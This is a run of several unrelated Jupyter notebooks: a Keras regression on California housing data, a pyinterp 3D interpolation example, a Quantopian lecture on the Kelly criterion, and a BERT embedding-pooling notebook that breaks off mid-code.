from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout
from keras.utils import np_utils
from keras import backend as K
from distutils.version import LooseVersion as LV
from keras import __version__
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
print('Using Keras version:', __version__, 'backend:', K.backend())
assert(LV(__version__) >= LV("2.0.0"))
chd = datasets.fetch_california_housing()
plt.figure(figsize=(15,10))
for i in range(8):
plt.subplot(4,2,i+1)
plt.scatter(chd.data[:,i], chd.target, s=2, label=chd.feature_names[i])
plt.legend(loc='best')
test_size = 5000
X_train_all, X_test_all, y_train, y_test = train_test_split(
chd.data, chd.target, test_size=test_size, shuffle=True)
X_train_single = X_train_all[:,0].reshape(-1, 1)
X_test_single = X_test_all[:,0].reshape(-1, 1)
print()
print('California housing data: train:',len(X_train_all),'test:',len(X_test_all))
print()
print('X_train_all:', X_train_all.shape)
print('X_train_single:', X_train_single.shape)
print('y_train:', y_train.shape)
print()
print('X_test_all', X_test_all.shape)
print('X_test_single', X_test_single.shape)
print('y_test', y_test.shape)
X_train = X_train_single
X_test = X_test_single
#X_train = X_train_all
#X_test = X_test_all
scaler = StandardScaler().fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
print('X_train: mean:', X_train.mean(axis=0), 'std:', X_train.std(axis=0))
print('X_test: mean:', X_test.mean(axis=0), 'std:', X_test.std(axis=0))
linmodel = Sequential()
linmodel.add(Dense(units=10, input_dim=X_train.shape[1], activation='relu'))
linmodel.add(Dense(units=1, activation='linear'))
linmodel.compile(loss='mean_squared_error',
optimizer='sgd')
print(linmodel.summary())
SVG(model_to_dot(linmodel, show_shapes=True).create(prog='dot', format='svg'))
%%time
epochs = 10
linhistory = linmodel.fit(X_train,
y_train,
epochs=epochs,
batch_size=32,
verbose=2)
plt.figure(figsize=(5,3))
plt.plot(linhistory.epoch,linhistory.history['loss'])
plt.title('loss');
if X_train.shape[1] == 1:
plt.figure(figsize=(10, 10))
plt.scatter(X_train, y_train, s=5)
reg_x = np.arange(np.min(X_train), np.max(X_train), 0.01).reshape(-1, 1)
plt.scatter(reg_x, linmodel.predict(reg_x), s=8, label='one hidden layer')
plt.legend(loc='best');
%%time
predictions = linmodel.predict(X_test)
print("Mean squared error: %.3f"
% mean_squared_error(y_test, predictions))
mlmodel = Sequential()
mlmodel.add(Dense(units=20, input_dim=X_train.shape[1], activation='relu'))
mlmodel.add(Dense(units=20, activation='relu'))
mlmodel.add(Dropout(0.5))
mlmodel.add(Dense(units=1, activation='linear'))
mlmodel.compile(loss='mean_squared_error',
optimizer='adam')
print(mlmodel.summary())
SVG(model_to_dot(mlmodel, show_shapes=True).create(prog='dot', format='svg'))
%%time
epochs = 10
history = mlmodel.fit(X_train,
y_train,
epochs=epochs,
batch_size=32,
verbose=2)
plt.figure(figsize=(5,3))
plt.plot(history.epoch,history.history['loss'])
plt.title('loss');
if X_train.shape[1] == 1:
plt.figure(figsize=(10, 10))
plt.scatter(X_train, y_train, s=5)
reg_x = np.arange(np.min(X_train), np.max(X_train), 0.01).reshape(-1, 1)
plt.scatter(reg_x, linmodel.predict(reg_x), s=8, label='one hidden layer')
plt.scatter(reg_x, mlmodel.predict(reg_x), s=8, label='multiple hidden layers')
plt.legend(loc='best');
%%time
predictions = mlmodel.predict(X_test)
print("Mean squared error: %.3f"
% mean_squared_error(y_test, predictions))
| 0.78345 | 0.984261 |
# 3D interpolation
This example shows how to interpolate values from arbitrary points in a 3D space of a function defined on a Cartesian grid.
Methods used performs an interpolation in 2D space by considering the axes of longitude and latitude of the grid, then performs a linear interpolation in the third dimension using the two values obtained by the 2D interpolation.
Let's start by building our interpolator:
```
import xarray as xr
import pyinterp.backends.xarray as pxr
ds = xr.load_dataset("../tests/dataset/tcw.nc")
# The grid used organizes the latitudes in descending order. We ask our
# constructor to flip this axis in order to correctly evaluate the bicubic
# interpolation from this 3D cube (only necessary to perform a bicubic
# interpolation).
interpolator = pxr.Grid3D(ds.data_vars["tcw"], increasing_axes=True)
interpolator
```
We will build a new grid that will be used to build a new interpolated grid.
```
import datetime
import numpy as np
# The coordinates used for interpolation are shifted to avoid using the
# points of the trivariate function.
mx, my, mz = np.meshgrid(
np.arange(-180, 180, 0.25) + 1 / 3.0,
np.arange(-80, 80, 0.25) + 1 / 3.0,
np.array([datetime.datetime(2002, 7, 2, 15, 0)], dtype="datetime64"),
indexing='ij')
```
We interpolate our grid using a classical [trivariate](https://pangeo-pyinterp.readthedocs.io/en/latest/generated/pyinterp.trivariate.html#pyinterp.trivariate) interpolation, then a [bicubic](https://pangeo-pyinterp.readthedocs.io/en/latest/generated/pyinterp.bicubic.html) interpolation in space followed by a linear interpolation in the temporal axis.
```
trivariate = interpolator.trivariate(
dict(longitude=mx.flatten(), latitude=my.flatten(), time=mz.flatten()))
bicubic = interpolator.bicubic(
dict(longitude=mx.flatten(), latitude=my.flatten(), time=mz.flatten()))
```
We transform our result cubes into a matrix.
```
trivariate = trivariate.reshape(mx.shape).squeeze(axis=2)
bicubic = bicubic.reshape(mx.shape).squeeze(axis=2)
lons = mx[:, 0].squeeze()
lats = my[0, :].squeeze()
```
Let's visualize our results.
```
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
%matplotlib inline
fig = plt.figure(figsize=(18, 9))
ax = fig.add_subplot(121, projection=ccrs.PlateCarree(central_longitude=180))
ax.pcolormesh(lons, lats, trivariate.T, cmap='jet',
transform=ccrs.PlateCarree())
ax.coastlines()
ax.set_extent([80, 170, -45, 30], crs=ccrs.PlateCarree())
ax.set_title("Trilinear")
ax = fig.add_subplot(122, projection=ccrs.PlateCarree(central_longitude=180))
ax.pcolormesh(lons, lats, bicubic.T, cmap='jet',
transform=ccrs.PlateCarree())
ax.coastlines()
ax.set_extent([80, 170, -45, 30], crs=ccrs.PlateCarree())
ax.set_title("Bicubic & Linear in time")
```
|
github_jupyter
|
import xarray as xr
import pyinterp.backends.xarray as pxr
ds = xr.load_dataset("../tests/dataset/tcw.nc")
# The grid used organizes the latitudes in descending order. We ask our
# constructor to flip this axis in order to correctly evaluate the bicubic
# interpolation from this 3D cube (only necessary to perform a bicubic
# interpolation).
interpolator = pxr.Grid3D(ds.data_vars["tcw"], increasing_axes=True)
interpolator
import datetime
import numpy as np
# The coordinates used for interpolation are shifted to avoid using the
# points of the trivariate function.
mx, my, mz = np.meshgrid(
np.arange(-180, 180, 0.25) + 1 / 3.0,
np.arange(-80, 80, 0.25) + 1 / 3.0,
np.array([datetime.datetime(2002, 7, 2, 15, 0)], dtype="datetime64"),
indexing='ij')
trivariate = interpolator.trivariate(
dict(longitude=mx.flatten(), latitude=my.flatten(), time=mz.flatten()))
bicubic = interpolator.bicubic(
dict(longitude=mx.flatten(), latitude=my.flatten(), time=mz.flatten()))
trivariate = trivariate.reshape(mx.shape).squeeze(axis=2)
bicubic = bicubic.reshape(mx.shape).squeeze(axis=2)
lons = mx[:, 0].squeeze()
lats = my[0, :].squeeze()
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
%matplotlib inline
fig = plt.figure(figsize=(18, 9))
ax = fig.add_subplot(121, projection=ccrs.PlateCarree(central_longitude=180))
ax.pcolormesh(lons, lats, trivariate.T, cmap='jet',
transform=ccrs.PlateCarree())
ax.coastlines()
ax.set_extent([80, 170, -45, 30], crs=ccrs.PlateCarree())
ax.set_title("Trilinear")
ax = fig.add_subplot(122, projection=ccrs.PlateCarree(central_longitude=180))
ax.pcolormesh(lons, lats, bicubic.T, cmap='jet',
transform=ccrs.PlateCarree())
ax.coastlines()
ax.set_extent([80, 170, -45, 30], crs=ccrs.PlateCarree())
ax.set_title("Bicubic & Linear in time")
| 0.493409 | 0.989702 |
# Risk Management and The Kelly Criterion
By Gideon Wulfsohn, Delaney Granizo-Mackenzie, and Thomas Wiecki
Part of the Quantopian Lecture Series:
* [quantopian.com/lectures](https://www.quantopian.com/lectures)
* [github.com/quantopian/research_public](https://github.com/quantopian/research_public)
Notebook released under the Creative Commons Attribution 4.0 License.
---
The Kelly Criterion is a method that was developed by John Larry Kelly Jr. while working at Bell Labs. Popularized by horse race gamblers and later by investors, the formula can be applied as a useful heuristic when deciding what percentage of your total captial should be allocated to a given strategy.
Lets run through a simple application of the Kelly Criterion which is defined as follows:
**Kelly Optimal Leverage = m<sub>i</sub> / s<sub>i</sub><sup>2</sup>**
* m = mean returns
* s = standard deviation of returns
```
# get pricing data for S&P 500 over a 13 year timeframe
start = '2002-01-02'
end = '2015-11-09'
df = get_pricing('SPY', fields=['close_price'], start_date=start, end_date=end)
# compute daily returns, add as new column within dataframe
daily_returns = (df.close_price.shift(-1) - df.close_price) / df.close_price
df = df.ix[1:]
df['daily_returns'] = daily_returns
df.head()
# compute mean and sd annual return using daily returns(252 trading days per year)
mean_annual_return = df.daily_returns.mean() * 252
annualized_std = df.daily_returns.std() * (252**.5)
print mean_annual_return
print annualized_std
mean_excess_return = mean_annual_return - .04
sharpe_ratio = mean_excess_return / annualized_std
opt_leverage = mean_excess_return / (annualized_std**2)
print "Sharpe Ratio: {}".format(sharpe_ratio)
print "Kelly Optimal Leverage: {}".format(opt_leverage)
capital = 100000
purchase = int(capital * opt_leverage)
print "If the kelly optimal leverage is {} and you have ${} to invest, you should \
buy ${} worth of SPY under the assumption you believe the \
expected values of your returns by viewing them as gaussian.".format(opt_leverage, capital, purchase)
```
# Mean-Varience Example
```
import math
import numpy as np
import cvxopt as opt
import matplotlib.pyplot as plt
from cvxopt import blas, solvers
np.random.seed(89)
# prevent cvxopt progress from printing
solvers.options['show_progress'] = False
# num assets
n = 4
# number of observations
nobs = 1000
def rand_weights(n):
''' Produces n random weights that sum to 1 '''
k = np.random.randn(n)
return k / sum(k)
def gen_returns(asset_count, nobs, drift=0.0):
'''
Creates normally distributed series
:params:
asset_count: <int> number of series to create
nobs: <int> number of observations
drift: <float> skews the distribution to one side
:returns:
np.ndarray with <asset_count> rows and <nobs> columns
'''
return np.random.randn(asset_count, nobs) + drift
def random_portfolio(returns, weight_func):
'''
Returns the mean and standard deviation of returns for a random portfolio
'''
w = weight_func(returns.shape[0])
mu = np.dot(np.mean(returns, axis=1) , w)
sigma = math.sqrt(np.dot(w, np.dot(np.cov(returns), w)))
# This recursion reduces outliers
if sigma > 2:
return random_portfolio(returns, weight_func)
return sigma, mu
# gather returns and plot
return_vec = gen_returns(n, nobs, drift=0.01)
stds, means = np.column_stack(
[random_portfolio(return_vec, rand_weights) for _ in xrange(500)]
)
f, ax = plt.subplots()
plt.plot(stds, means, 'o')
ax.set_xlabel('Volitility')
ax.set_ylabel('Return')
# convert to matrix
k = np.array(return_vec)
S = opt.matrix (np.cov(k))
pbar = opt.matrix(np.mean(k, axis=1))
# conditioning optimizer
G = -opt.matrix(np.eye(n)) # negative n x n identity matrix
h = opt.matrix(0.0, (n ,1))
A = opt.matrix(1.0, (1, n))
b = opt.matrix(1.0)
# expected returns
N = 100
mus = [10**(5.0* t/N - 1.0) for t in range(N)]
# efficient frontier weights
portfolios = [
solvers.qp(mu*S, -pbar, G, h, A, b)['x']
for mu in mus
]
# risk and return
returns = [blas.dot(pbar, x) for x in portfolios]
risks = [np.sqrt(blas.dot(x, S*x)) for x in portfolios]
plt.plot(risks, returns, 'y-o')
def get_kelly_portfolios():
ww = np.dot(np.linalg.inv(opt.matrix(S)), opt.matrix(pbar))
rks = []; res = [];
for i in np.arange(0.05, 20, 0.0001):
w = ww / i
rks.append(blas.dot(pbar, opt.matrix(w)))
res.append(np.sqrt(blas.dot(opt.matrix(w), S*opt.matrix(w))))
return res, rks
res, rks = get_kelly_portfolios()
# display kelly portfolios for various leverages
plt.plot(res, rks, 'ko', markersize=3)
plt.plot(res, np.array(rks) * -1, 'ko', markersize=3);
```
|
github_jupyter
|
# get pricing data for S&P 500 over a 13 year timeframe
start = '2002-01-02'
end = '2015-11-09'
df = get_pricing('SPY', fields=['close_price'], start_date=start, end_date=end)
# compute daily returns, add as new column within dataframe
daily_returns = (df.close_price.shift(-1) - df.close_price) / df.close_price
df = df.ix[1:]
df['daily_returns'] = daily_returns
df.head()
# compute mean and sd annual return using daily returns(252 trading days per year)
mean_annual_return = df.daily_returns.mean() * 252
annualized_std = df.daily_returns.std() * (252**.5)
print mean_annual_return
print annualized_std
mean_excess_return = mean_annual_return - .04
sharpe_ratio = mean_excess_return / annualized_std
opt_leverage = mean_excess_return / (annualized_std**2)
print "Sharpe Ratio: {}".format(sharpe_ratio)
print "Kelly Optimal Leverage: {}".format(opt_leverage)
capital = 100000
purchase = int(capital * opt_leverage)
print "If the kelly optimal leverage is {} and you have ${} to invest, you should \
buy ${} worth of SPY under the assumption you believe the \
expected values of your returns by viewing them as gaussian.".format(opt_leverage, capital, purchase)
import math
import numpy as np
import cvxopt as opt
import matplotlib.pyplot as plt
from cvxopt import blas, solvers
np.random.seed(89)
# prevent cvxopt progress from printing
solvers.options['show_progress'] = False
# num assets
n = 4
# number of observations
nobs = 1000
def rand_weights(n):
''' Produces n random weights that sum to 1 '''
k = np.random.randn(n)
return k / sum(k)
def gen_returns(asset_count, nobs, drift=0.0):
'''
Creates normally distributed series
:params:
asset_count: <int> number of series to create
nobs: <int> number of observations
drift: <float> skews the distribution to one side
:returns:
np.ndarray with <asset_count> rows and <nobs> columns
'''
return np.random.randn(asset_count, nobs) + drift
def random_portfolio(returns, weight_func):
'''
Returns the mean and standard deviation of returns for a random portfolio
'''
w = weight_func(returns.shape[0])
mu = np.dot(np.mean(returns, axis=1) , w)
sigma = math.sqrt(np.dot(w, np.dot(np.cov(returns), w)))
# This recursion reduces outliers
if sigma > 2:
return random_portfolio(returns, weight_func)
return sigma, mu
# gather returns and plot
return_vec = gen_returns(n, nobs, drift=0.01)
stds, means = np.column_stack(
[random_portfolio(return_vec, rand_weights) for _ in xrange(500)]
)
f, ax = plt.subplots()
plt.plot(stds, means, 'o')
ax.set_xlabel('Volitility')
ax.set_ylabel('Return')
# convert to matrix
k = np.array(return_vec)
S = opt.matrix (np.cov(k))
pbar = opt.matrix(np.mean(k, axis=1))
# conditioning optimizer
G = -opt.matrix(np.eye(n)) # negative n x n identity matrix
h = opt.matrix(0.0, (n ,1))
A = opt.matrix(1.0, (1, n))
b = opt.matrix(1.0)
# expected returns
N = 100
mus = [10**(5.0* t/N - 1.0) for t in range(N)]
# efficient frontier weights
portfolios = [
solvers.qp(mu*S, -pbar, G, h, A, b)['x']
for mu in mus
]
# risk and return
returns = [blas.dot(pbar, x) for x in portfolios]
risks = [np.sqrt(blas.dot(x, S*x)) for x in portfolios]
plt.plot(risks, returns, 'y-o')
def get_kelly_portfolios():
ww = np.dot(np.linalg.inv(opt.matrix(S)), opt.matrix(pbar))
rks = []; res = [];
for i in np.arange(0.05, 20, 0.0001):
w = ww / i
rks.append(blas.dot(pbar, opt.matrix(w)))
res.append(np.sqrt(blas.dot(opt.matrix(w), S*opt.matrix(w))))
return res, rks
res, rks = get_kelly_portfolios()
# display kelly portfolios for various leverages
plt.plot(res, rks, 'ko', markersize=3)
plt.plot(res, np.array(rks) * -1, 'ko', markersize=3);
| 0.756987 | 0.945248 |
# BERT Embedding Generation
This notebook contains generating BERT<sub>BASE</sub> embedding on different pooling strategies.
```
import os
import urllib
from google.colab import drive, files
from getpass import getpass
from google.colab import drive
ROOT = '/content/drive'
GOOGLE_DRIVE_PATH = 'My Drive/Colab Notebooks/recommender/w266-final'
PROJECT_PATH = os.path.join(ROOT, GOOGLE_DRIVE_PATH)
drive.mount(ROOT)
%cd {PROJECT_PATH}
import os
import sys
import re
import pandas as pd
import numpy as np
import itertools
import pickle
import random
import tensorflow as tf
from commons.store import PickleStore, NpyStore
from tqdm import tqdm
from IPython.core.display import HTML
from importlib import reload
%load_ext autoreload
%autoreload 2
```
## 1. Load Pre-filtered Dataset
Load the clean pre-processed dataset.
```
amazon = False
if amazon:
input_pkl = '../dataset/25-65_tokens_grouped_Movies_and_TV_v2.pkl'
else:
input_pkl = '../dataset/25-65_tokens_grouped_yelp.pkl'
pkl_store = PickleStore(input_pkl)
grouped_reviews_df = pkl_store.load(asPandasDF=True, \
columns=['reviewerID', 'asin', 'overall', 'userReviews', 'itemReviews'])
print(len(grouped_reviews_df))
display(HTML(grouped_reviews_df.head(1).to_html()))
#grouped_reviews = grouped_reviews_df[['userReviews', 'itemReviews', 'overall']].to_numpy()
grouped_reviews = grouped_reviews_df.to_numpy()
grouped_reviews[0]
!pip install transformers
import tensorflow as tf
from transformers import BertTokenizer
from transformers import TFBertModel, BertConfig
# Detect hardware
try:
tpu_resolver = tf.distribute.cluster_resolver.TPUClusterResolver() # TPU detection
except ValueError:
tpu_resolver = None
gpus = tf.config.experimental.list_logical_devices("GPU")
# Select appropriate distribution strategy
if tpu_resolver:
tf.config.experimental_connect_to_cluster(tpu_resolver)
tf.tpu.experimental.initialize_tpu_system(tpu_resolver)
strategy = tf.distribute.experimental.TPUStrategy(tpu_resolver)
print('Running on TPU ', tpu_resolver.cluster_spec().as_dict()['worker'])
elif len(gpus) > 1:
strategy = tf.distribute.MirroredStrategy([gpu.name for gpu in gpus])
print('Running on multiple GPUs ', [gpu.name for gpu in gpus])
elif len(gpus) == 1:
strategy = tf.distribute.get_strategy() # default strategy that works on CPU and single GPU
print('Running on single GPU ', gpus[0].name)
else:
strategy = tf.distribute.get_strategy() # default strategy that works on CPU and single GPU
print('Running on CPU')
print("Number of accelerators: ", strategy.num_replicas_in_sync)
```
Using BERT huggingface <img src='https://huggingface.co/front/assets/huggingface_logo.svg' width='20px'> library to load the BERT tokenizer and model.
```
bert_model_name = 'bert-base-uncased'
MAX_LEN = 128
config = BertConfig()
config.output_hidden_states = True # set to True to obtain hidden states
with strategy.scope():
tokenizer = BertTokenizer.from_pretrained(bert_model_name, do_lower_case=True)
user_bert = TFBertModel.from_pretrained(bert_model_name, config=config)
item_bert = TFBertModel.from_pretrained(bert_model_name, config=config)
```
## 2. Pooling Strategies
### 2.1. Last Hidden State
```
def last_hidden_state_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens)[0]
item_embedding = item_model(item_tokens)[0]
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
#_embeddings[i] = ((dict(user_embedding=user_embedding,
# item_embedding=item_embedding)), label)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = last_hidden_state_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.2. Sum Last Four Hidden States
```
def sum_last_four_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# Sum last four hiddden states
user_embedding = tf.reduce_sum(user_embedding[-4:], axis=0)
item_embedding = tf.reduce_sum(item_embedding[-4:], axis=0)
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = sum_last_four_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlastfour_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlastfour_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.3. Sum Last Twelve Hidden States
```
def sum_last_twelve_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# Sum last twelve hiddden states
user_embedding = tf.reduce_sum(user_embedding[-12:], axis=0)
item_embedding = tf.reduce_sum(item_embedding[-12:], axis=0)
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = sum_last_twelve_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlasttwelve_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlasttwelve_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.4. Second-To-Last Hidden State
```
def second_to_last_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# Second-to-last hiddden states
user_embedding = user_embedding[-2]
item_embedding = item_embedding[-2]
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = second_to_last_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_secondtolast_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_secondtolast_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.5. First Layer Hidden State
```
def first_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# First embedding
user_embedding = user_embedding[0]
item_embedding = item_embedding[0]
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = first_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_first_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_first_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
### 2.6. Concat Last Four Hidden States
```
def concat_last_four_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# Concat last four hiddden states
user_embedding = tf.concat(user_embedding[-4:], axis=2)
item_embedding = tf.concat(item_embedding[-4:], axis=2)
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = concat_last_four_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_concatlastfour_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_concatlastfour_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
```
|
github_jupyter
|
import os
import urllib
from google.colab import drive, files
from getpass import getpass
from google.colab import drive
ROOT = '/content/drive'
GOOGLE_DRIVE_PATH = 'My Drive/Colab Notebooks/recommender/w266-final'
PROJECT_PATH = os.path.join(ROOT, GOOGLE_DRIVE_PATH)
drive.mount(ROOT)
%cd {PROJECT_PATH}
import os
import sys
import re
import pandas as pd
import numpy as np
import itertools
import pickle
import random
import tensorflow as tf
from commons.store import PickleStore, NpyStore
from tqdm import tqdm
from IPython.core.display import HTML
from importlib import reload
%load_ext autoreload
%autoreload 2
amazon = False
if amazon:
input_pkl = '../dataset/25-65_tokens_grouped_Movies_and_TV_v2.pkl'
else:
input_pkl = '../dataset/25-65_tokens_grouped_yelp.pkl'
pkl_store = PickleStore(input_pkl)
grouped_reviews_df = pkl_store.load(asPandasDF=True, \
columns=['reviewerID', 'asin', 'overall', 'userReviews', 'itemReviews'])
print(len(grouped_reviews_df))
display(HTML(grouped_reviews_df.head(1).to_html()))
#grouped_reviews = grouped_reviews_df[['userReviews', 'itemReviews', 'overall']].to_numpy()
grouped_reviews = grouped_reviews_df.to_numpy()
grouped_reviews[0]
!pip install transformers
import tensorflow as tf
from transformers import BertTokenizer
from transformers import TFBertModel, BertConfig
# Detect hardware
try:
tpu_resolver = tf.distribute.cluster_resolver.TPUClusterResolver() # TPU detection
except ValueError:
tpu_resolver = None
